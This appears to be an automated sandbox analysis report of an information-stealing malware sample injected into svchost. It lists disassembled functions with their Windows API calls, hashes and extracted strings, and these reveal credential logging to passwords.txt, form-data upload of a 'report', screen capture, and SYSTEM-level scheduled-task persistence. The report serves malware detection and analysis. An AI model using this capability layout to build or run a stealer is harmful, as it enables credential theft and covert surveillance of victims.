                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              • API String ID: 1808236364-2343086565
                                                                                                                                                                                                              • Opcode ID: 6224f54c5fce87f71371bf230d1bb58b896beb86d33589013a219616278088f1
                                                                                                                                                                                                              • Instruction ID: 22e701879a1d64b8129ef2312589548ce987c6c8c9af32bb6c62ffce5ca7a6b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6224f54c5fce87f71371bf230d1bb58b896beb86d33589013a219616278088f1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DA1A271D4120AAFDB10DB649C59FAFBBB8EF84798F148644FA04E7240DB709A15CBE0
                                                                                                                                                                                                              Function 02CA2A90 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 355memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 02CA2AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02CA2AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA2ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02CA2B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02CA2B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA2B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02CA2BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02CA2BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA2BED
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,02CDFB50,00000000), ref: 02CA2C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02CA2C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA2C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02CA2C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02CA2C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA2C8B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02CA2D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02CA2D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02CA2D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02CA2D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CDFB50), ref: 02CA2DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CDFB50), ref: 02CA2DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA2DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB50), ref: 02CA2DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA2E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02CA2E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02CA2E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02CA2E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 5DD2BF7Da$5dd2bfbfa$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-2570866807
                                                                                                                                                                                                              • Opcode ID: 522a45eb1158a1b1af0c2217603e7d39ebdd3c424979d0033cb7b63e7b461d08
                                                                                                                                                                                                              • Instruction ID: 88c3f9fbfc6d875f8f81f80ab34452360c4e7f0b9b4cccaf3e8bff5c7aa6ba7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 522a45eb1158a1b1af0c2217603e7d39ebdd3c424979d0033cb7b63e7b461d08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7C10931645316AFE7209F649C59FAB77ECEF88748F444A18F986DB180DB70D908C7A2
                                                                                                                                                                                                              Function 02CA3BA4 Relevance: 67.0, APIs: 27, Strings: 11, Instructions: 477filememorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA3BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CA3C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA3C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA3C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA3CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CA3CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CA3CD6
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 02CA3D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$61de29337166780$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              • API String ID: 3203035732-1310954842
                                                                                                                                                                                                              • Opcode ID: e536497e0687b87f67d7204e387ab6dab1d7534e521696a1a9cb42836199a25e
                                                                                                                                                                                                              • Instruction ID: f2eeff180ef182c6e0a0617faa52d65a8343e90967a5a0cfde884922797d00cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e536497e0687b87f67d7204e387ab6dab1d7534e521696a1a9cb42836199a25e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F117319046879BCF258F309CB5BFBBBA6AF85348F4445C4ED869B241DB729A09C790
                                                                                                                                                                                                              Function 00403560 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • p=<u, xrefs: 0040394B
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1711019342
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              Function 02CA2040 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 284filewindowmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02CA2053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02CA2064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02CA2079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02CA208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 02CA20A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02CA20D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 02CA20EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 02CA215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA216F
                                                                                                                                                                                                              • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02CA218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(02CA255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02CA21A6
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA21CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA21EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CA255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02CA2209
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA2214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02CA224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02CA2260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02CA2270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02CA228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02CA22A3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02CA22B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA22CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02CA22DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02CA22EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02CA22FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 02CA2308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 02CA230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA2323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02CA2340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 02CA234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02CA2358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorObjectPointerTokenWrite$CloseCompatibleCurrentFreeHandleOpenProcessReleaseThread$AdjustAllocBitmapBitsChangeConvertCursorDeleteErrorFindInfoInformationLastLocalLookupNamedNotificationPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2969484848-808120212
                                                                                                                                                                                                              • Opcode ID: 1fd3ef3a37a0a098f9bdcebd1eb11bccaab350d1d40fc574b15b9766c6510c4f
                                                                                                                                                                                                              • Instruction ID: 6f406e7f2c6703d24647b9acff6b923ceb93f0d6a6eccb2c7cd4e158642ba9fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fd3ef3a37a0a098f9bdcebd1eb11bccaab350d1d40fc574b15b9766c6510c4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B913AB1546311AFE3109F64DC88F6BBBADEFC9785F404A1DF685D2240D77099058BA2
                                                                                                                                                                                                              Function 02CAF9C0 Relevance: 63.3, APIs: 31, Strings: 5, Instructions: 256memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAF9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CEDDC8,00000000), ref: 02CAFA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFA2F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CEDDC8), ref: 02CAFA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(02CEDDC8,00000000), ref: 02CAFA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(02CEDDC8), ref: 02CAFA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?), ref: 02CAFAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CED998,00000000), ref: 02CAFB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFB17
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CED998), ref: 02CAFB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CED998,00000000), ref: 02CAFB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFB69
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CED998), ref: 02CAFB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAFB91
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAFBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 02CAFC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02CAFC6F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAFCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAFCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAFCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAFCBD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$a23c4015$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 959110331-1137149671
                                                                                                                                                                                                              • Opcode ID: cc7c550468e16bb9ab7cd2affeff78467e01f8b347cac8ccac5639ccfe3ec6ab
                                                                                                                                                                                                              • Instruction ID: cb573f0c709fb7f9953a8cda124cecd140ee83c72b1adfa183949a1b824f0a99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7c550468e16bb9ab7cd2affeff78467e01f8b347cac8ccac5639ccfe3ec6ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B911A30D417069FEB115B78A828BAF7BE8EF4A745F548658E847DB340DB71CA14C7A0
                                                                                                                                                                                                              Function 02C980C0 Relevance: 61.4, APIs: 32, Strings: 3, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C97C80: IsUserAnAdmin.SHELL32 ref: 02C97C8A
                                                                                                                                                                                                                • Part of subcall function 02C97C80: memset.MSVCRT ref: 02C97CC1
                                                                                                                                                                                                                • Part of subcall function 02C97C80: memset.MSVCRT ref: 02C97CD9
                                                                                                                                                                                                                • Part of subcall function 02C97C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02C97CFB
                                                                                                                                                                                                                • Part of subcall function 02C97C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02C97D21
                                                                                                                                                                                                                • Part of subcall function 02C97C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97DAD
                                                                                                                                                                                                                • Part of subcall function 02C97C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02C97DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C98105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02C98112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C98124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C98145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C98157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 02C981A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02C981D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,5DD2BD0Ba,5dd2bd8aa), ref: 02C98253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02C98285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C982A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C982BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C982CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C982F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
